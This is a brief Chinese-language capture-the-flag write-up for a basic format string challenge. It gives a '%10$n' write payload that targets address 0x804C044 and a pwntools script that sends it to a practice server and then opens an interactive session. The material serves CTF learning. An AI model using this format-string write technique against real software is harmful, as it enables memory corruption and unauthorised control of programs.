这题是个基本格式化字符串漏洞利用;

满足if条件即可得到答案;

使 nptr 与 dword_804C044 相等即可;

可以使我们利用的是 第一次的输入输出;

addr=0x804C044
payload=p32(addr)+'%10$n'

先得出偏移量:

from pwn import *
p=remote('node3.buuoj.cn',26937)
addr=0x804C044
payload=p32(addr)+'%10$n'
p.sendline(payload)
p.sendline('4')
p.interactive()

有问题欢迎留言 ❄